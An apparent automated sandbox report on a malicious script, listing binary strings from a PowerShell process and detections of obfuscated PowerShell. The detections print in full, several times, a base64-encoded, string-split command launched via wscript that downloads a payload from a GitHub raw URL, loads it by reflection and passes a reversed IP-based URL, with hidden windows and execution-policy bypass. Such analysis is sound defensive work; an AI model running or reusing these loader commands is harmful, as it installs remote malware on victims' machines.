Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: 6?ll\System.pdb,4 source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aem.pdbdllj source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJyc", "0", "false");
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAC568148 push ebx; ret 6_2_00007FFAAC56816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAC569557 push esp; retf 6_2_00007FFAAC569558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAC63236C push 8B485F91h; iretd 6_2_00007FFAAC632371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAAC6323BE push 8B485F91h; iretd 6_2_00007FFAAC6323C6
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
